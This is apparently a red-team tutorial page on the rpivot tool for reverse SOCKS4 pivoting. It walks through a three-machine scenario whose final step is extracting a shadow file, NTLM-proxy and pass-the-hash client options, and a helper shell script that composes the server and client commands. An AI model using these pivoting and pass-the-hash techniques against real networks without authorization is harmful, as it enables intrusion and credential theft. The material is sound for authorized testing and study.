Rpivot

RPIVOT lets you tunnel traffic into an internal network over SOCKS4. It works like SSH dynamic port forwarding (ssh -D), but in the opposite direction: the pivot host connects back out to you, and you get a local SOCKS proxy into its network.

Source: https://github.com/klsecservices/rpivot

Requirements

  • Python 2.6/2.7 (run the tool with a Python 2 interpreter)

  • Add this line to the /etc/proxychains.conf file (the port must match the SOCKS port the rpivot server exposes):

    • socks4 127.0.0.1 1080

When to use rpivot?

Imagine this scenario:

Diagram
  • Machine A can connect to B

  • Machine B can connect to C

  • C can't connect directly to A

  • So, in this case, we run the rpivot server on C and the rpivot client on B; the client connects back to C, and C then proxies its traffic through B

  • After that, we can reach A from C through the local SOCKS4 proxy

  • Open the server on machine C

  • Connect the client to the server on machine B

  • Reach the 3rd machine, A, through the proxy

  • Extract the shadow file of the 3rd machine

In Wireshark we can see that all the communication went through port 4444, the server port we set for rpivot

Wireshark Results

We can also pivot through an NTLM proxy

In this case we add the NTLM proxy flags on the client side:

Or, using pass-the-hash:
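The following is an added example, not code from the rpivot repository or from the original page. It ties the steps above together: a small shell helper that composes the server command for machine C, the plain client command for machine B, and the NTLM-proxy and pass-the-hash client variants, all with one consistent set of ports, plus a check that the proxychains.conf entry really points at rpivot's SOCKS4 port (a socks5 line or a mismatched port is the usual reason "proxychains runs but nothing gets through"). The flag names (--server-ip, --server-port, --proxy-port, --ntlm-proxy-ip, --ntlm-proxy-port, --domain, --username, --password, --hashes) are those documented in the rpivot README; the IP addresses, the ./rpivot checkout path and the sample credentials are assumptions. The server port is 4444 to match the Wireshark capture above.

```shell
#!/bin/sh
# Added example, not part of rpivot: compose the rpivot server/client
# commands for the A-B-C scenario with one consistent set of ports and
# verify the proxychains.conf entry before trusting it.
# Flag names follow the rpivot README; confirm with `python2 server.py -h`
# and `python2 client.py -h` on your checkout.

RPIVOT_DIR="${RPIVOT_DIR:-./rpivot}"   # assumption: local clone of the repo
SERVER_IP="10.10.10.10"                # assumption: machine C, reachable from B
SERVER_PORT=4444                       # client -> server port (matches the Wireshark capture)
SOCKS_PORT=1080                        # local SOCKS4 port on C; proxychains must use this one

# Machine C: listen for the client on SERVER_PORT and expose SOCKS4 on SOCKS_PORT.
rpivot_server_cmd() {
  printf 'python2 %s/server.py --server-ip 0.0.0.0 --server-port %s --proxy-port %s\n' \
    "$RPIVOT_DIR" "$SERVER_PORT" "$SOCKS_PORT"
}

# Machine B: connect back to C; from then on C can reach what B can reach.
rpivot_client_cmd() {
  printf 'python2 %s/client.py --server-ip %s --server-port %s\n' \
    "$RPIVOT_DIR" "$SERVER_IP" "$SERVER_PORT"
}

# Machine B behind an NTLM-authenticating HTTP proxy. secret_kind is
# "password" or "hashes" (pass-the-hash, LM:NT as in the README example).
# Usage: rpivot_client_ntlm_cmd PROXY_IP PROXY_PORT DOMAIN USER password|hashes SECRET
rpivot_client_ntlm_cmd() {
  proxy_ip="$1"; proxy_port="$2"; domain="$3"; user="$4"; secret_kind="$5"; secret="$6"
  case "$secret_kind" in
    password) auth="--password $secret" ;;
    hashes)   auth="--hashes $secret" ;;
    *) echo "secret_kind must be password or hashes" >&2; return 1 ;;
  esac
  printf 'python2 %s/client.py --server-ip %s --server-port %s --ntlm-proxy-ip %s --ntlm-proxy-port %s --domain %s --username %s %s\n' \
    "$RPIVOT_DIR" "$SERVER_IP" "$SERVER_PORT" "$proxy_ip" "$proxy_port" "$domain" "$user" "$auth"
}

# proxychains only reaches rpivot if its ProxyList has a socks4 (not socks5)
# entry on 127.0.0.1 with SOCKS_PORT. Returns 0 when exactly one such
# uncommented line exists, 1 otherwise.
check_proxychains_conf() {
  conf="$1"
  [ -r "$conf" ] || return 1
  n=$(grep -cE "^[[:space:]]*socks4[[:space:]]+127\.0\.0\.1[[:space:]]+${SOCKS_PORT}([[:space:]]|$)" "$conf" || true)
  [ "$n" -eq 1 ]
}

# Stand-alone use: `sh rpivot_cmds.sh show` prints the commands to run on C
# and B, then checks the real proxychains config on this host.
if [ "${1:-}" = "show" ]; then
  echo "# on machine C:"; rpivot_server_cmd
  echo "# on machine B:"; rpivot_client_cmd
  if check_proxychains_conf /etc/proxychains.conf; then
    echo "proxychains.conf OK"
  else
    echo "proxychains.conf: no single 'socks4 127.0.0.1 $SOCKS_PORT' entry" >&2
  fi
fi
```

Start the server command on C before the client command on B, since the client connects back to the server. SOCKS4 carries IPv4 addresses only, so address A by IP when going through proxychains. For pass-the-hash the value is LM:NT; when only the NT hash is known, the LM half is the well-known empty-LM value aad3b435b51404eeaad3b435b51404ee.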
